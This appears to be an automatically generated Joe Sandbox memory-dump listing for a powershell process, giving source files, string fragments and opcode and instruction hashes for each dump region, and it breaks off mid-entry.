                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$tLfk
                                                    • API String ID: 0-751579585
                                                    • Opcode ID: 39f0190802b438578de6c50cbcd23682a95798906857b9b47db28cae5dd3699c
                                                    • Instruction ID: 312e62569af70bb0e5c37fdc506578f5aafa6ffc1f0ad85e7728c19680bf3bc7
                                                    • Opcode Fuzzy Hash: 39f0190802b438578de6c50cbcd23682a95798906857b9b47db28cae5dd3699c
                                                    • Instruction Fuzzy Hash: 747258B4A00211CFDBA0CF18C954B69BBF2BB85304F55C199D9099B396CB72ED86CF51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ftl$(ftl$x.ek$x.ek$-ek
                                                    • API String ID: 0-3369671065
                                                    • Opcode ID: 9e3c1488a434a65a6b5d0fbd297678ebb45fad2ca7df844b992fdd543c4d9398
                                                    • Instruction ID: 2c0e7d7dba0d4d857ba211ae720a4eefbff09df9770310d112d3dead819b7167
                                                    • Opcode Fuzzy Hash: 9e3c1488a434a65a6b5d0fbd297678ebb45fad2ca7df844b992fdd543c4d9398
                                                    • Instruction Fuzzy Hash: 0EF1AFB0A002259FEB64DF68C954BAEB7F3AB85304F10C5A5D909AF391CB71DD818F51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: h]Sj$h]Sj$h]Sj$ISj
                                                    • API String ID: 0-866246885
                                                    • Opcode ID: 11e89515dca8f392822339d5b297ecf35e412f01a4bb664d4f36f860764673f8
                                                    • Instruction ID: 9feaee34054afe69073a4c1baccbc9839d153295f2609474fee7c5b8da3a3a87
                                                    • Opcode Fuzzy Hash: 11e89515dca8f392822339d5b297ecf35e412f01a4bb664d4f36f860764673f8
                                                    • Instruction Fuzzy Hash: 84123F34B002188FDB25DB64C8947EEB7B2AF89305F1580E9D40AAB365DF35AD85DF81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ftl$(ftl$x.ek
                                                    • API String ID: 0-2565601413
                                                    • Opcode ID: a715ae735a91392df273f08b89d397951bf3b1930aa431b10315c717f2d6ab46
                                                    • Instruction ID: 403b8abd7505c9312eacb49a645825ccec869925f8825abc8cf7231b06996993
                                                    • Opcode Fuzzy Hash: a715ae735a91392df273f08b89d397951bf3b1930aa431b10315c717f2d6ab46
                                                    • Instruction Fuzzy Hash: 6E918FB0B002159BD744DF64C554BAEBBF3AB8A300F54C168D915AF391CB76ED818F92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: x.ek$-ek
                                                    • API String ID: 0-3063351012
                                                    • Opcode ID: cbb6c359ceccb9cfb91fd2b8ab5d9a17b9b35ce2ac821200a57b6e451bf99ee9
                                                    • Instruction ID: e50e16fb7334a5d238f741743f6902ee09bf7cef76865df97fcb7bc2111bf60b
                                                    • Opcode Fuzzy Hash: cbb6c359ceccb9cfb91fd2b8ab5d9a17b9b35ce2ac821200a57b6e451bf99ee9
                                                    • Instruction Fuzzy Hash: 8FD19CB0A002059FD754DF68C564BAEBBE2AF89318F10D569D9016F395CB71EC42CF92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: x.ek$-ek
                                                    • API String ID: 0-3063351012
                                                    • Opcode ID: 324ed3d21b91cac439005580801e0757efe50e67ea2b0a0a7968f472be835913
                                                    • Instruction ID: d8b3ad1452dc9fbf772f6f71f0d1ab63d5740f99162bc34a57bf74f252280015
                                                    • Opcode Fuzzy Hash: 324ed3d21b91cac439005580801e0757efe50e67ea2b0a0a7968f472be835913
                                                    • Instruction Fuzzy Hash: 7BD18EB0A012199FDB54DF54C954BAABBB2FB85304F10C1A9D909AF385CB32DD81CF91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: x.ek$-ek
                                                    • API String ID: 0-3063351012
                                                    • Opcode ID: 67b7f44dfae385e32d77cef605ef46a7d8b2a6506c6e81b425967c80eca67d1a
                                                    • Instruction ID: d9861212fea71ecd3ffd5339e1590cd532c621c6504a27c9943e574db6793c47
                                                    • Opcode Fuzzy Hash: 67b7f44dfae385e32d77cef605ef46a7d8b2a6506c6e81b425967c80eca67d1a
                                                    • Instruction Fuzzy Hash: 61B18BB0A002059FDB14DF64C554BAEBBF2AF89318F14D269D8016F395CB31E946CFA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ftl$x.ek
                                                    • API String ID: 0-3292982111
                                                    • Opcode ID: 095f4e60c52206dee1b5eca9286c6ea882576d152cfa509486060751d6698b37
                                                    • Instruction ID: 62e57051559531ffd691a0d88143081fa76a9686c2e3cfd485da328ea846697b
                                                    • Opcode Fuzzy Hash: 095f4e60c52206dee1b5eca9286c6ea882576d152cfa509486060751d6698b37
                                                    • Instruction Fuzzy Hash: FF919FB4A002159FD700CF64C955BAEBBF2AB86314F14C169E415AF392CB76AD81CF91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \VSj$\VSj
                                                    • API String ID: 0-3140382358
                                                    • Opcode ID: 89eb7147f19dbc8705f97dd082d47ccd05305db705cdd917757e66fdb4e2d85a
                                                    • Instruction ID: bd9315d048e2b3ed5ff418500fc291489b0e7b7d3ea0f10665acb94ac6fbe36d
                                                    • Opcode Fuzzy Hash: 89eb7147f19dbc8705f97dd082d47ccd05305db705cdd917757e66fdb4e2d85a
                                                    • Instruction Fuzzy Hash: F7716AB0E00209DFDB14DFA9C8807DEBBF2AF88714F148529E855E7254EB74A842CF95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \VSj$\VSj
                                                    • API String ID: 0-3140382358
                                                    • Opcode ID: db698537cc0810944ff534090df99a6ffe0fb460963cd0139f4e0260719643f2
                                                    • Instruction ID: e31bed947374fe4d35110ac35a063160684196ea245f772b7589a21f3d87a13f
                                                    • Opcode Fuzzy Hash: db698537cc0810944ff534090df99a6ffe0fb460963cd0139f4e0260719643f2
                                                    • Instruction Fuzzy Hash: 51713870E002099FDB14DFA9C8857DEBBF2AF88714F148529E855EB254EB74A842CF85
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: h]Sj$ISj
                                                    • API String ID: 0-626755437
                                                    • Opcode ID: 93530757276cd69242b95a27dba603c7d023287e1676db481a1cf6d8e31ad3de
                                                    • Instruction ID: 3ee9f48234ea3c72d08b52ccb830e9f9846c53a3aed8ba3b688b1ed4f17d8992
                                                    • Opcode Fuzzy Hash: 93530757276cd69242b95a27dba603c7d023287e1676db481a1cf6d8e31ad3de
                                                    • Instruction Fuzzy Hash: A9310E30B042188FCB26DB64C8946EEB7B2BF89305F1544E9D50AAB355DB359E85CFC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ftl
                                                    • API String ID: 0-131038942
                                                    • Opcode ID: 95de3122d0ad736b0afabc640e486cb984de03faa7cf8ed72f0d3c2564465a2d
                                                    • Instruction ID: 4ecfa0e257e4de269b39ef8f185231ea043e2cc6b8392f0ec57289476c54f3da
                                                    • Opcode Fuzzy Hash: 95de3122d0ad736b0afabc640e486cb984de03faa7cf8ed72f0d3c2564465a2d
                                                    • Instruction Fuzzy Hash: 342268B4A00215CFEBA4CF14C854FA9BBB2BB85304F54C199D9099B392CB72ED86CF51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \VSj
                                                    • API String ID: 0-4099914709
                                                    • Opcode ID: f188d8c50658df8a52f9ca6503ed17a1da003754cf484b7b162ee7c1437e6a53
                                                    • Instruction ID: a897a537bf2e6ff85dc128afc592bd5c44a355aeb7243932cab9731530c16f61
                                                    • Opcode Fuzzy Hash: f188d8c50658df8a52f9ca6503ed17a1da003754cf484b7b162ee7c1437e6a53
                                                    • Instruction Fuzzy Hash: 96B16F70E00209CFDB14DFA9C8857DEBBF2AF88704F148529E455E7354EB74A846CB91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: x.ek
                                                    • API String ID: 0-2146835383
                                                    • Opcode ID: 3ca216c16675888c06ce511c363484077f90dd5ddf5e28d5b434a3b38f40802e
                                                    • Instruction ID: f89ea66bf0ecd5224d684367213d030e18ddf6469980eed0ba83ad8206582d4f
                                                    • Opcode Fuzzy Hash: 3ca216c16675888c06ce511c363484077f90dd5ddf5e28d5b434a3b38f40802e
                                                    • Instruction Fuzzy Hash: 71319070B40214ABE704AF64C955FAFBBA3ABC6744F50C424E9026F3D1CF769C428B91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 84rl
                                                    • API String ID: 0-1857319961
                                                    • Opcode ID: d35d0a8fef8721fa854fe9cf2476460759a5f0c7bfe3688bdf604d5465c78b1a
                                                    • Instruction ID: 277198e64059433eab96ecd71f2acd669d7a015714d2315ee7e4dc966cee95c5
                                                    • Opcode Fuzzy Hash: d35d0a8fef8721fa854fe9cf2476460759a5f0c7bfe3688bdf604d5465c78b1a
                                                    • Instruction Fuzzy Hash: 683124B0A05252DFC7258B54C868A6AFFF2EF86614F18C19AE8559F283C731DC42C7E1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 48c1a57a85cc1dd5d8b83d9a11b0949d8ce366a078d0a0ed1358373737d231a6
                                                    • Instruction ID: de6f51cb9848517dcbaa6ea8d25f9f16ff886e4a4b366f09038eb3e7ed426879
                                                    • Opcode Fuzzy Hash: 48c1a57a85cc1dd5d8b83d9a11b0949d8ce366a078d0a0ed1358373737d231a6
                                                    • Instruction Fuzzy Hash: A23238B1B003068FDB649F69D8287BEBBE2AFC5211F14C1AAD915CB2D1DB31C941D7A1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25ba9e35db890199fca8e9e46ca6512d24bd128e1a5fd773e3c325f55597c0e1
                                                    • Instruction ID: d1b5707a0bf0bd5b3f9ae37ff9539eb3adafae8f99ba3d880741262b71726c98
                                                    • Opcode Fuzzy Hash: 25ba9e35db890199fca8e9e46ca6512d24bd128e1a5fd773e3c325f55597c0e1
                                                    • Instruction Fuzzy Hash: 31222774A002099FCB15CF98D494AEEFBB1FF88310F258599E855AB355C731EC52CB90
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4639c777fb4fb297690632fbb528b1ffa793831e9e193203065fa35456d81a53
                                                    • Instruction ID: eeec1ec76313c236024d9237153aad6e9631c5e013ee2aaf8a9a8ad83ee9fafc
                                                    • Opcode Fuzzy Hash: 4639c777fb4fb297690632fbb528b1ffa793831e9e193203065fa35456d81a53
                                                    • Instruction Fuzzy Hash: E1D11B74A01218AFDB15CF98D594ADDBBB2FF48310F24C199E845AB352D735ED82CB90
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ef529657eacf17673efcb0d3b4c75878d63127aaa69cb041fa832600c9da463
                                                    • Instruction ID: a0d4ed87689c84d756eace7e9609e3314a14f6ef82cd69b15ee27128a84bf277
                                                    • Opcode Fuzzy Hash: 6ef529657eacf17673efcb0d3b4c75878d63127aaa69cb041fa832600c9da463
                                                    • Instruction Fuzzy Hash: 8DD1E774A00219EFDB15CF98D484ADDBBB2FF88310F258159E859AB355C731ED92CB90
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4e7f42106a58401070850c147e2b9be99cde1fa960f4c629ca8c279838324a9d
                                                    • Instruction ID: 2fe1a0f92f86f4658166ee9522dd1d3c3147578aba7b68962ebce75d5019f1bc
                                                    • Opcode Fuzzy Hash: 4e7f42106a58401070850c147e2b9be99cde1fa960f4c629ca8c279838324a9d
                                                    • Instruction Fuzzy Hash: 3BC1B171A10208CFDB14DFA4D584A9DBBF2FF85310F1185A9E546AB365DB34EC4ACB80
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c95191105e4a74e434aa26d4bce2856cefbd61eb1980ba4fcbfaa545ae6dada6
                                                    • Instruction ID: 2e0275adf9cedd253de406f73be9b1e0ee192190e4e187b155e8068441823820
                                                    • Opcode Fuzzy Hash: c95191105e4a74e434aa26d4bce2856cefbd61eb1980ba4fcbfaa545ae6dada6
                                                    • Instruction Fuzzy Hash: BCA157B0B043069FDB659B7498247AE7BE2AF86204F14C5AAD411CF2D2CB36DD41D7A2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 275ae4260edfefa627c42c5914571304d3f0b768137fc6b984bbe0ec9ab73ad8
                                                    • Instruction ID: 44cbec9387efb15b59e0f07421565968be62324abaebb79b1beb39fc164b2619
                                                    • Opcode Fuzzy Hash: 275ae4260edfefa627c42c5914571304d3f0b768137fc6b984bbe0ec9ab73ad8
                                                    • Instruction Fuzzy Hash: E5B15B70E00209DFDB14CFA9DC857DDBBF1AF88714F148569E894EB294EB74A846CB81
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0328ca046e7c369383e7c26401604368680cde319fc88d0677531c9d1ea47a23
                                                    • Instruction ID: eaee77e2036c6c025bd4fc5f10ac1fdb8e60efedb732803dd2f897b49cd27f35
                                                    • Opcode Fuzzy Hash: 0328ca046e7c369383e7c26401604368680cde319fc88d0677531c9d1ea47a23
                                                    • Instruction Fuzzy Hash: A7816B30A01204DFCB15EF74D9949EDBBF6FF89604B1984A9E4499B362CB35EC85CB50
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 507275f2edcba7078d3faf6616df2d8baa47c68cbb5589d08c0d29a818ba8ae8
                                                    • Instruction ID: 25db7766b0d5fe30359e9719ab141d434ad8787a5664a1826864055d08198884
                                                    • Opcode Fuzzy Hash: 507275f2edcba7078d3faf6616df2d8baa47c68cbb5589d08c0d29a818ba8ae8
                                                    • Instruction Fuzzy Hash: 7671AD70A002098FDB14DF68C880ADDBBF6FF85314F148569E559EB691DB35EC46CB80
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 18f0bac245451bd3df73d810355f279c050e19dc651992a526f10dfe1c56622d
                                                    • Instruction ID: 5f0c54fbb04ed60f4aa291dc3b4e7e52e8e089cb89bb039d16866539614737dd
                                                    • Opcode Fuzzy Hash: 18f0bac245451bd3df73d810355f279c050e19dc651992a526f10dfe1c56622d
                                                    • Instruction Fuzzy Hash: AF713970A102099FDB14DFA4D480BEDBBF2BF88304F148469E556AB6A1DB35AD46CB81
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6fe1951d0f976c63a1d9e88768b9b9da3cdb50607a95727e30826e5d5598a5b
                                                    • Instruction ID: 6cf11ec8e14a570bfa545771ee0a3ac750f973037dca685d7b97ecb8d507c15c
                                                    • Opcode Fuzzy Hash: a6fe1951d0f976c63a1d9e88768b9b9da3cdb50607a95727e30826e5d5598a5b
                                                    • Instruction Fuzzy Hash: A94144F4B042028FCBA48F64D568B6E77E2AF55348F18C2A6D8019B2D1DB36CE40D7A1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74100e91b926228241a53df0d7ddbd410b2b24b7db08afefcf2e1ddc19213a8b
                                                    • Instruction ID: 877aa5a213836fa427bcfafa04d84ead081798a79ae07e3c92234571c9013589
                                                    • Opcode Fuzzy Hash: 74100e91b926228241a53df0d7ddbd410b2b24b7db08afefcf2e1ddc19213a8b
                                                    • Instruction Fuzzy Hash: 8E4169B2B402269BCB645A689824BAFF7E5EFC4210B14C26ACC16DB341DB31D901D7E1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a824b0551c73eeef53c3ba587ad4f5db784d3782dad7f3f7d7eb080f9fdb88ef
                                                    • Instruction ID: d110fcfb085915c690d30283c3b308d0d15f2208e26f8e2722f38f1111057b05
                                                    • Opcode Fuzzy Hash: a824b0551c73eeef53c3ba587ad4f5db784d3782dad7f3f7d7eb080f9fdb88ef
                                                    • Instruction Fuzzy Hash: B0415C71B002049FDB149F64C894AAD7BF2EF89754F1540B8E946EBBA1DB38AC41CB90
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90fd1650f9427b42690d6c04068cff6b01c45818c105bf2720eeb80086d1b953
                                                    • Instruction ID: 7151561db0ddbf20e9d096127d5341ecf41862d904c6e0e6c1d20e2495d7c16f
                                                    • Opcode Fuzzy Hash: 90fd1650f9427b42690d6c04068cff6b01c45818c105bf2720eeb80086d1b953
                                                    • Instruction Fuzzy Hash: 5C414AB0A002099FDB14DFA5C8847DDBBF2FF84304F158469D44AAB695DB79AC46CB81
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 832f7953afe9fd276d26cf8e29ab06473b6b276fe088fb0b468bcd7f0dceed79
                                                    • Instruction ID: 53e6688619c4ad070d25d5d681c0659b8d5cf3cd684b3d3045ab261a62615891
                                                    • Opcode Fuzzy Hash: 832f7953afe9fd276d26cf8e29ab06473b6b276fe088fb0b468bcd7f0dceed79
                                                    • Instruction Fuzzy Hash: 0E313CF27002218BD751FB685C257AEB7E39FC6215F14C56ACA02AB342DE728D01C7E2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9251d834cd6439f0443b28466c2caf8c4c1e576bdf171ff3cf89a7535a1d999c
                                                    • Instruction ID: 4fc8b5855621a2665955f7bda50206baef1cfcc95789005dbbf88e3fea775032
                                                    • Opcode Fuzzy Hash: 9251d834cd6439f0443b28466c2caf8c4c1e576bdf171ff3cf89a7535a1d999c
                                                    • Instruction Fuzzy Hash: A2218BB23103065BEF646B699865B3BB7E69BC5711F34C52AE905CB281CE76C8419360
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ac39be5db6b7c87789251e16cd86afb333d2b3c580453f0a9ef34bbbd983480
                                                    • Instruction ID: 4cefa83f82890e7e1df398f27e05e47226fb9fe16ff22ed55732f77279d4510f
                                                    • Opcode Fuzzy Hash: 1ac39be5db6b7c87789251e16cd86afb333d2b3c580453f0a9ef34bbbd983480
                                                    • Instruction Fuzzy Hash: 4821BBF638032A5BDB645ABA9825F3B77D69FC5718F14C92AE406CB2C1CE35C940A360
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90004a9d814b94896488078a476c915eed5583a3d644c40551dfca3483dcaca8
                                                    • Instruction ID: 2919ce626bcc4d7c6598ee82880c714603debe1f20c46f8b2900a07e5fb2ec4c
                                                    • Opcode Fuzzy Hash: 90004a9d814b94896488078a476c915eed5583a3d644c40551dfca3483dcaca8
                                                    • Instruction Fuzzy Hash: C2211774A006099FCB05CF99C8D0AAABBF1FF49310B1581AAE859EB751C731FC51CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54db10dda1ec922544a72268cd3430ee8d6e78eae4666d0ee1c553f4d03cec1c
                                                    • Instruction ID: d5622d3ac1dc86c9f92b7ad30707a0ae9138b07b861c64e86386b249eec03e2b
                                                    • Opcode Fuzzy Hash: 54db10dda1ec922544a72268cd3430ee8d6e78eae4666d0ee1c553f4d03cec1c
                                                    • Instruction Fuzzy Hash: 2A21BBF534436A2BDBA40A764824B373FE64F82314F18C55AD840CB2D2CA79C940E361
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e79fb54e5b24c7581b0d9c69eddbd71ce0b26a120d55fd41a83cf633ed7128f1
                                                    • Instruction ID: d6457789cc08b58a516e3a6b11cc8a560c735b118d9f7be1657e3504961da954
                                                    • Opcode Fuzzy Hash: e79fb54e5b24c7581b0d9c69eddbd71ce0b26a120d55fd41a83cf633ed7128f1
                                                    • Instruction Fuzzy Hash: 931159F6980216EFCB649F69D954AAAB7F4FF84250B25C266DC08A7200D730D940D7F1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
